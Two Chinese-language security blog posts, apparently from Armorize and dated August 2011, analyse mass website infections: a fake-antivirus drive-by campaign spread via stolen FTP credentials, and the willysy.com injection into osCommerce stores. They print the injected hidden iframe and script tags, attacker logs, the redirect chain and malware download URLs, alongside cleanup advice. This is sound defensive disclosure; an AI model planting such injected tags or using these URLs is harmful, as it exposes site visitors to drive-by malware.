
2011年8月21日
k985ytv 大規模感染行動持續進行,散播偽冒的防毒軟體
在8月14日,我們開始發現另一波大規模感染,透過被感染的網站大量散播偽冒的防毒軟體。此攻擊目前仍然在持續進行,以下是我們的報導。
[大綱]
[1. 摘要]
[2. 瀏覽者遭受感染的過程]
[3. 散播偽冒的防毒軟體]
[4. ftp log 樣本(來自受感染的網站)]
[5. 部份受感染的網站列表及截圖]
[1. 摘要]
1. 一開始偵測到的日期: 8月14日。
2. 受感染網站的數量: 我們估計至少有 22,400 個網域 (unique)。攻擊者第一波的攻勢並沒有成功,因此 Google 索引 超過了 536,000 被感染的網頁。然而,在之後的攻勢中攻擊者修正了注入的 pattern,讓惡意程式碼 (script) 的部份能夠正確的被執行 (不像第一波攻擊中只是被顯示出來而已)。 在此之後,Google 就不再索引這些被感染的網站了。
3. 被注入的惡意程式碼 (script):
第一波 (沒有使用到no <script> tag ,因此有被 Google 索引到):
上述完整的文字可以在這裡找到。
之後的攻勢 (加上了 <script> tag,因此惡意程式碼 (script) 可以被正確執行)
上述完整的文字可以在這裡找到。
上述完整的文字可以在這裡找到。
4. 攻擊碼(Exploit code) 相關資訊: 使用BlackHole exploit pack 的變種版本,進行 Drive-by download。
5. 惡意程式: 偽冒的防毒軟體,在不同的作業系統會顯示出不同的名稱: Winsods XP中顯示的是 "XP Security 2012" under Windows XP,Windows Vista中是 "Vista Antivirus 2012",而 Windows 7中則是 "Win 7 Antivirus 2012"。
6. 感染方式: 主要是透過偷來的 FTP 帳密,使用自動化程式對網站的FTP 服務進行抓取檔案,注入惡意程式碼 (script),再上傳回網站的步驟。FTP 帳密是從被惡意程式感染的個人電腦中取得的。惡意程式會搜尋個人電腦中儲存的 FTP 帳號密碼,同時會監聽 FTP 的流量,之後將盜取到的帳密資訊傳回給攻擊者。
7. 惡意網域及相關IPs:
重導站:
1. hysofufewobe.com (ex: http://hysofufewobe.com/k985ytv.htm)
2. zirycatum.com (ex: http://zirycatum.com/k985ytv.htm)
3. numudozaf.com (ex: http://numudozaf.com/k985ytv.htm)
上述所有都解析到相同的IP:178.17.163.92 (位於Moldova (烏克蘭南端)),在7月25日透過同一個人: "Alexandr S Grebennikov" 註冊。
攻擊碼是由以下幾個網域提供:
1. jbvnhw.com (ex: http://jbvnhw.com/i87yta.htm)
2. mlvurp.com (ex: http://mlvurp.com/i87yta.htm)
3. rprlpb.com (ex: http://rprlpb.com/i87yta.htm)
4. efnxkg.com (ex: http://efnxkg.com/i87yta.htm)
以上也都解析到同一個IP: 69.50.202.74 (AS18866)(位於美國),屬於 Atjeu Website Hosting。在8月14日使用名字: "Alardo Macias" 進行註冊。
8. 防毒軟體偵測率: 目前在 VirusTotal上是 5 / 43 :
[2. 瀏覽者遭受感染的過程]
為了顯示瀏覽者是如何遭受感染以及我們是如何分析的過程,我們錄製了以下影片:
[3. 散播偽冒的防毒軟體]
偽冒的防毒軟體會在不同的作業系統會顯示出不同的名稱: Winsods XP中顯示的是 "XP Security 2012" under Windows XP,Windows Vista中是 "Vista Antivirus 2012",而 Windows 7中則是 "Win 7 Antivirus 2012"。以下為部份截圖:
[4. ftp log 樣本(來自受感染的網站)]
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "LIST /example.com/ftp/" 226 11862
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "TYPE I" 200 -
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "PASV" 227 -
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "SIZE index.htm" 213 -
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "RETR index.htm" 226 12573
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "TYPE I" 200 -
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "PASV" 227 -
204.12.252.138 UNKNOWN user1004 [14/Aug/2011:22:31:51 -0500] "STOR index.htm" 226 13018
[5. 部份受感染的網站列表及截圖]
uwpagina.nl
mydesert.com
paramountcommunication.com
freebloggiveaways.com
sikhsangeet.com
thenewcivilrightsmovement.com
shakeshack.com
greenandcleanmom.org
noor7.us
restorationsos.com
gopusanj.com
amateurmodelsite.com
animationblogspot.com
accessoryworld.net.au
advancedwaterfilters.com
autoventa.com.bo
usgoldbuyers.com
kharidani.biz
nwp4life.com
chicagofree.info
howwazyourweekend.com
marinerslearningsystem.com
articleolive.com
pitchanything.net
toysonics.com
diaperdecisions.com
realtimedesigner.com
group-games.com
coffeebreakwithlizandkate.com
tvtopten.com
la-zen.com
mountainmaids.com
healthlady.com
articleality.com
shophenna.com
lifescircle.info
xmworks.com
articleoncall.com
trainace.com
grupo20.com
tinkfanatic.com
metrokingpc.ca
rapidgiveawayprofits.com
icebreakers.ws
9y3h.com
miamitvchannel.com
beemaster.com
buydropstop.com
freeautoblogger.com
bid4agents.com
interstateplastics.com
b3bootcamp.net
bestbuyuniforms.com
antigravityinc.com
azholisticchamber.com
root-h.org
affiliateplrmarketing.com
justinmichie.com
cyberbullyingreport.com
creativeblogsolutions.com
advancedfanpagesolutions.com
sungrubbies.com
homewiththeboys.net
marsvenus.com
nhwellnesscenters.com
universityfashions.com
bandjob.com
atmananda.com
flyl4l.com
filmyforum.com
iftn.ie
rjharris2012.com
heppellmedia.com
unionsquarecafe.com
vatanfilm.co.cc
statebrief.com
daylabor.org
affnet.com
passingthru.com 906065,775885.net
khojit.com.au
listacquisition.com
vestalwatch.com
printedblindsfactory.com
oauq.org
theoriginalrudebitch.com
quickcash4.us
intraligilaw.ca
ohswekenspeedway.com
autosenbolivia.net
cityclassifiedsads.com
keepingmeposted.com
henckengaines.com
sportsmatchmaker.com
premiereworks.com
ahyasalam.com
sandiegoduilawyer.com
wecravegamestoo.com
vodkasobieski.com
itrmagictricks.com
f1racefactory.com
epoquehotels.us
freakshowvideo.com
write-solution.com
hydrocephaluskids.org
intersectioncapital.com
killzonezero.com
www.en.chosenfewurbano.com
www.generalmoly.com
www.pinnint.com
www.hiphop.org
www.fiftysevendegrees.com
spbaseball.org
www.ohiogisociety.org
www.senjomartialarts.com
www.assignmentproof.com
tulakesbaptist.com
www.generalmoly.com
www.balboaparkdancers.org
sho-ryders.com
www.azholisticchamber.com
www.ajseatery.com
www.thegrangelifestylevillage.com.au
www.north-fayette.com
tilos.com
www.parteen-gaa.com
www.hawaiiancouncil.org
www.levi-catering.com
sbnmarble.com
sayanythingblog.com
cincyshopper.com
www.fiftysevendegrees.com
www.cincygardens.com
www.freeridesurfshop.com
sayanythingblog.com
steve-watt.com
www.thacoshammer.info
www.stevenjackson.net
www.dearborndumpsterrental.com
basementrejects.com
www.hawaiiancouncil.org
www.frostbrothersentertainment.net
www.levi-catering.com
www.chicagodumpsterrental.org
www.center44.com
sbnmarble.com
www.chicagodumpster.org
buysomenow.com
www.noinkonyourfingers.com
www.nashvilledesign.com
photocrystal.biz
www.momsclubofbranchburg.org
www.cardboardrecycling.freedumpsterrental.com
www.atlantadumpster.org
designresumes.com
www.fiftysevendegrees.com
3millionfans.com
lpmndc.org
www.bugfreeservices.com
ibvsct.com
繼續閱讀全文...
2011年8月19日
willysy.com 針對osCommerce網站進行大規模感染,超過八百萬個網頁遭受感染
(作者: Wayne Huang, Chris Hsiao, NightCola Lin, Sun Huang, Fyodor Yarochkin, Crane Ku)
[大綱]
1. 摘要
2. 攻擊時間表
3. 攻擊來源
4. 針對的弱點
5. 受感染網站的症狀
6. 檢測及清除
7. 感染細節
8. 相關截圖
9. 後續補充
[1. 摘要]
1. 感染數量:
在8月3日時,Google 的搜尋結果顯示超過了7,690,000 (willysy) + 629,000 (exero) = 8,300,000 被感染的網頁 (八百多萬個)。 此數量指的是被感染的網頁數量,並不是指網站或網域。
2. 感染的iframe如下:
一開始的型式:
3. 攻擊者:
來自烏克蘭的ip: 178.217.163.33,178.217.165.111,178.217.165.71,178.217.163.214 (都是 AS47694)。Agent 字串: "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
4. 攻擊目標與相應漏洞:
攻擊目標為有使用 osCommerce 的網站,所使用的漏洞: osCommerce Remote Edit Site Info Vulnerability,osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability,及 Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass。
5. 所插入的惡意連結中會針對以下漏洞攻擊網站瀏覽者:
CVE-2010-0840 -- Java Trust
CVE-2010-0188 –- PDF LibTiff
CVE-2010-0886 -– Java SMB
CVE-2006-0003 -– IE MDAC
CVE-2010-1885 – HCP
6. 執行攻擊碼的網域:
arhyv.ru,counv.ru
註冊日期: July 20th
註冊者: leshkinaira@yahoo.com
IP: 46.16.240.18 (AS51632 烏克蘭 - Inet Ltd)
相關網域: xlamv.ru,vntum.ru
7. 惡意程式網址:
http://46.16.240.18/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=mdacot
[2. 攻擊時間表]
7月10日 -- "Angel Injection" 寫了一篇關於 "osCommerce Remote Edit Site Info Vulnerability" (osCommerce 網站可被遠端編輯資訊之弱點) (這裡,這裡)。
7月11日 -- 攻擊團隊開始測試該項漏洞。
7月20日 -- 攻擊者註冊了 arhyv.ru 及 counv.ru 網域,所使用的email: leshkinaira@yahoo.com
7月23日 -- 針對 "Store Name" 這個變數發動攻擊:
插入的iframe由一開始的:
7月24日 -- 為我們一開始分析這個事件的時間點,一開始Google顯示只有90,000個網頁被感染:
7月31日 -- Google 顯示 超過 3,410,000 (willysy) + 386,000 (exero) = 3,800,000 (三百多萬) 網頁有遭受感染。
另一方面,Bing 顯示 有 1,800,000 (一百多萬) 個網頁有被 willysy.com 感染:
8月3日 -- Google 顯示超過了 5,820,000 (willysy) + 497,000 (exero) = 6,300,000 (六百多萬) 的網頁有遭受到感染
8月7日 -- Google 顯示超過了 7,690,000 (willysy) + 629,000 (exero) = 8,300,000 (八百多萬) 個網頁遭受感染。
[3. 攻擊來源]
有許多IPs 已經被認定是這次事件的攻擊者: 178.217.163.33,178.217.165.111,178.217.165.71,178.217.163.214 (這些都屬於 AS47694)。這些IPs 都來自烏克蘭,且屬於ISP: www.didan.com.ua。
攻擊者使用了以下的User-Agent 字串:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)
如果你有 log 或者其他攻擊來源可以分享的,請連絡我們。(wayne@armorize.com)
[4. 針對的弱點]
這波攻擊鎖定了使用osCommerce 架設的網站,利用了許多 osCommerce 已知的漏洞,包含: osCommerce Remote Edit Site Info Vulnerability (於 2011/7/10 公開),osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability (於 2011/5/14公開),及 Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass (於2010/5/30 公開)。
以下為部份 log 樣本:
[5. 受感染網站的症狀]
1. 網站中 osCommerce 的 "Store Name" 變數會被插入以下一種程式碼:
[6. 檢測及清除]
以下為我們建議檢測及清除的流程。如果你有任何疑問或者需要我們幫你檢測,請連絡我們 (wayne@armorize.com)。
1. 檢查是否受到感染。
1.1 搜尋 logs 查看有無以下情形:
1.1.1 來自以下IPs的存取: 178.217.163.33,178.217.165.111,178.217.165.71,178.217.163.214。
1.1.2 透過以下 agent 字串進行存取: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)
1.2 搜尋你的網站查看有無以下程式碼:
1.3 或者直接透過 HackAlert 幫你進行檢測。
2. 在你用來管理網站的電腦上安裝防毒軟體。
3. 找尋及清除存在的後門。
4. 找尋及清除感染進來的惡意程式碼。
5. 將你的 osCommerce 升到最新版,同時使用 .htaccess 來保護管理者資料夾。
6. 更換相關密碼 (包括你的 hosting 管裡介面及osCommerce中管理員的密碼)
一個很好的文章,教我們如何讓 osCommerce 更安全:(感謝 Markus 提供):
http://forums.oscommerce.com/topic/313323-how-to-secure-your-oscommerce-22-site/
最新版的 osCommerce 可以在這邊下載:
http://www.oscommerce.com/solutions/downloads
[7. 感染細節]
這部影片錄下整個感染流程,在我們錄的時候,僅有 90,000 的網頁被感染。
而以下是我們新錄製的,此時已經有超過六百萬的網頁被感染:
1. 受感染的網站被插入以下一種惡意程式碼:
2. 瀏覽器在載入 http://willysy.com/images/banners/ 時,會重導(http 302)到 http://papucky.eu/ext/
3. papucky.eu/ext/ 的內容 在這裡 (pastebin),會去載入 http://gooqlepics.com/include.js?in=864 裡面的 javascript
4. Javascript 在這裡 (pastebin),解開混碼後,會產生一個iframe指向:
http://yandekapi.com/api?in=864
5. http://yandekapi.com/api?in=864 的內容 在這裡,會重導到: http://arhyv.ru/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV
6. http://arhyv.ru/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV 的內容 在這裡,解開混碼後,可以看到原始攻擊碼,這個攻擊碼同時攻擊了多個漏洞。
7. 漏洞成功執行後,瀏覽器會下載以下這隻惡意程式並且執行:
http://46.16.240.18/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=mdacot
[8. 相關截圖]
具有弱點的 osCommerce 網站允許使用者不需要管理者權限就可以存取及修改變數資訊:
以下為部份被攻擊網站的截圖,請注意title的部份,都有被插入惡意程式碼,這是因為 osCommerce 預設會將 STORE_NAME 這個部份做為 title 來進行顯示 (顯示在title部份的惡意程式碼並不會被執行,因為他被當做是title內容來顯示,值得注意的是,這個STORE_NAME並不是只有用在title部份而已,在其他部份的情況下則會被正確執行):
[9. 後續補充]
截至目前(8月19)為止,除了原本兩種惡意程式碼之外,我們有發現到新的 pattern (透過一樣的漏洞插入的):
原本的:
持續觀察到的:
繼續閱讀全文...
[大綱]
1. 摘要
2. 攻擊時間表
3. 攻擊來源
4. 針對的弱點
5. 受感染網站的症狀
6. 檢測及清除
7. 感染細節
8. 相關截圖
9. 後續補充
[1. 摘要]
1. 感染數量:
在8月3日時,Google 的搜尋結果顯示超過了7,690,000 (willysy) + 629,000 (exero) = 8,300,000 被感染的網頁 (八百多萬個)。 此數量指的是被感染的網頁數量,並不是指網站或網域。
2. 感染的iframe如下:
一開始的型式:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>隨後衍變為:
<script src=http://exero.eu/catalog/jquery.js></script>
3. 攻擊者:
來自烏克蘭的ip: 178.217.163.33,178.217.165.111,178.217.165.71,178.217.163.214 (都是 AS47694)。Agent 字串: "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
4. 攻擊目標與相應漏洞:
攻擊目標為有使用 osCommerce 的網站,所使用的漏洞: osCommerce Remote Edit Site Info Vulnerability,osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability,及 Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass。
5. 所插入的惡意連結中會針對以下漏洞攻擊網站瀏覽者:
CVE-2010-0840 -- Java Trust
CVE-2010-0188 –- PDF LibTiff
CVE-2010-0886 -– Java SMB
CVE-2006-0003 -– IE MDAC
CVE-2010-1885 – HCP
6. 執行攻擊碼的網域:
arhyv.ru,counv.ru
註冊日期: July 20th
註冊者: leshkinaira@yahoo.com
IP: 46.16.240.18 (AS51632 烏克蘭 - Inet Ltd)
相關網域: xlamv.ru,vntum.ru
7. 惡意程式網址:
http://46.16.240.18/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=mdacot
[2. 攻擊時間表]
7月10日 -- "Angel Injection" 寫了一篇關於 "osCommerce Remote Edit Site Info Vulnerability" (osCommerce 網站可被遠端編輯資訊之弱點) (這裡,這裡)。
7月11日 -- 攻擊團隊開始測試該項漏洞。
178.217.163.33 - - [11/Jul/2011:12:15:04 -0500] "GET /admin/configuration.php/login.php HTTP/1.1" 200 24492 "http://__Masked__by_armorize.com/admin/configuration.php/login.php" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
7月20日 -- 攻擊者註冊了 arhyv.ru 及 counv.ru 網域,所使用的email: leshkinaira@yahoo.com
7月23日 -- 針對 "Store Name" 這個變數發動攻擊:
178.217.165.111 - - [23/Jul/2011:13:50:05 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 24835 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 178.217.165.111 - - [23/Jul/2011:13:50:06 -0500] "POST /admin/configuration.php/login.php?gID=1&cID=1&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
插入的iframe由一開始的:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>爾後演變為:
<script src=http://exero.eu/catalog/jquery.js></script>
7月24日 -- 為我們一開始分析這個事件的時間點,一開始Google顯示只有90,000個網頁被感染:
7月31日 -- Google 顯示 超過 3,410,000 (willysy) + 386,000 (exero) = 3,800,000 (三百多萬) 網頁有遭受感染。
另一方面,Bing 顯示 有 1,800,000 (一百多萬) 個網頁有被 willysy.com 感染:
8月3日 -- Google 顯示超過了 5,820,000 (willysy) + 497,000 (exero) = 6,300,000 (六百多萬) 的網頁有遭受到感染
8月7日 -- Google 顯示超過了 7,690,000 (willysy) + 629,000 (exero) = 8,300,000 (八百多萬) 個網頁遭受感染。
[3. 攻擊來源]
有許多IPs 已經被認定是這次事件的攻擊者: 178.217.163.33,178.217.165.111,178.217.165.71,178.217.163.214 (這些都屬於 AS47694)。這些IPs 都來自烏克蘭,且屬於ISP: www.didan.com.ua。
攻擊者使用了以下的User-Agent 字串:
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)
如果你有 log 或者其他攻擊來源可以分享的,請連絡我們。(wayne@armorize.com)
[4. 針對的弱點]
這波攻擊鎖定了使用osCommerce 架設的網站,利用了許多 osCommerce 已知的漏洞,包含: osCommerce Remote Edit Site Info Vulnerability (於 2011/7/10 公開),osCommerce 2.3.1 (banner_manager.php) Remote File Upload Vulnerability (於 2011/5/14公開),及 Oscommerce Online Merchant v2.2 File Disclosure And Admin ByPass (於2010/5/30 公開)。
以下為部份 log 樣本:
178.217.163.33 - - [11/Jul/2011:12:15:04 -0500] "GET /admin/configuration.php/login.php HTTP/1.1" 200 24492 "http://__Masked__by_armorize.com" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 178.217.165.111 - - [23/Jul/2011:13:50:05 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 24835 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 178.217.165.111 - - [23/Jul/2011:13:50:06 -0500] "POST /admin/configuration.php/login.php?gID=1&cID=1&action=save HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 178.217.165.111 - - [23/Jul/2011:13:50:07 -0500] "GET /admin/configuration.php/login.php?gID=1&cID=1&action=edit HTTP/1.1" 200 21883 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)" 178.217.165.71 - - [23/Jul/2011:19:55:37 -0500] "GET /admin/configuration.php/login.php?cID=1&action=edit HTTP/1.1" 200 25014 "http://__Masked__by_armorize.com/admin/configuration.php?cID=1" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)"
[5. 受感染網站的症狀]
1. 網站中 osCommerce 的 "Store Name" 變數會被插入以下一種程式碼:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
<script src=http://exero.eu/catalog/jquery.js></script>2. 攻擊者大部份會留下至少一個 (有時候會更多個) 的後門 (或稱之為 "webshells")。這個在 share hosting 網站上更常發生,因為後門程式可以存取在相同機器上,其他網站的資料:
[6. 檢測及清除]
以下為我們建議檢測及清除的流程。如果你有任何疑問或者需要我們幫你檢測,請連絡我們 (wayne@armorize.com)。
1. 檢查是否受到感染。
1.1 搜尋 logs 查看有無以下情形:
1.1.1 來自以下IPs的存取: 178.217.163.33,178.217.165.111,178.217.165.71,178.217.163.214。
1.1.2 透過以下 agent 字串進行存取: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)
1.2 搜尋你的網站查看有無以下程式碼:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
<script src=http://exero.eu/catalog/jquery.js></script>
1.3 或者直接透過 HackAlert 幫你進行檢測。
2. 在你用來管理網站的電腦上安裝防毒軟體。
3. 找尋及清除存在的後門。
4. 找尋及清除感染進來的惡意程式碼。
5. 將你的 osCommerce 升到最新版,同時使用 .htaccess 來保護管理者資料夾。
6. 更換相關密碼 (包括你的 hosting 管裡介面及osCommerce中管理員的密碼)
一個很好的文章,教我們如何讓 osCommerce 更安全:(感謝 Markus 提供):
http://forums.oscommerce.com/topic/313323-how-to-secure-your-oscommerce-22-site/
最新版的 osCommerce 可以在這邊下載:
http://www.oscommerce.com/solutions/downloads
[7. 感染細節]
這部影片錄下整個感染流程,在我們錄的時候,僅有 90,000 的網頁被感染。
而以下是我們新錄製的,此時已經有超過六百萬的網頁被感染:
1. 受感染的網站被插入以下一種惡意程式碼:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
<script src=http://exero.eu/catalog/jquery.js></script>
2. 瀏覽器在載入 http://willysy.com/images/banners/ 時,會重導(http 302)到 http://papucky.eu/ext/
3. papucky.eu/ext/ 的內容 在這裡 (pastebin),會去載入 http://gooqlepics.com/include.js?in=864 裡面的 javascript
4. Javascript 在這裡 (pastebin),解開混碼後,會產生一個iframe指向:
http://yandekapi.com/api?in=864
5. http://yandekapi.com/api?in=864 的內容 在這裡,會重導到: http://arhyv.ru/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV
6. http://arhyv.ru/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV 的內容 在這裡,解開混碼後,可以看到原始攻擊碼,這個攻擊碼同時攻擊了多個漏洞。
7. 漏洞成功執行後,瀏覽器會下載以下這隻惡意程式並且執行:
http://46.16.240.18/9VBMa76FFnB4VAYu0X5j755pMiSyVrcV?s=mdacot
[8. 相關截圖]
具有弱點的 osCommerce 網站允許使用者不需要管理者權限就可以存取及修改變數資訊:
以下為部份被攻擊網站的截圖,請注意title的部份,都有被插入惡意程式碼,這是因為 osCommerce 預設會將 STORE_NAME 這個部份做為 title 來進行顯示 (顯示在title部份的惡意程式碼並不會被執行,因為他被當做是title內容來顯示,值得注意的是,這個STORE_NAME並不是只有用在title部份而已,在其他部份的情況下則會被正確執行):
[9. 後續補充]
截至目前(8月19)為止,除了原本兩種惡意程式碼之外,我們有發現到新的 pattern (透過一樣的漏洞插入的):
原本的:
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
<script src=http://exero.eu/catalog/jquery.js></script>
持續觀察到的:
<iframe src="http://derryastros.com/images/1/go.php" width="0" height="0" frameborder="0"></iframe>
<script src=http://lamacom.net/images/j/></script>
繼續閱讀全文...
訂閱:
文章
(
Atom
)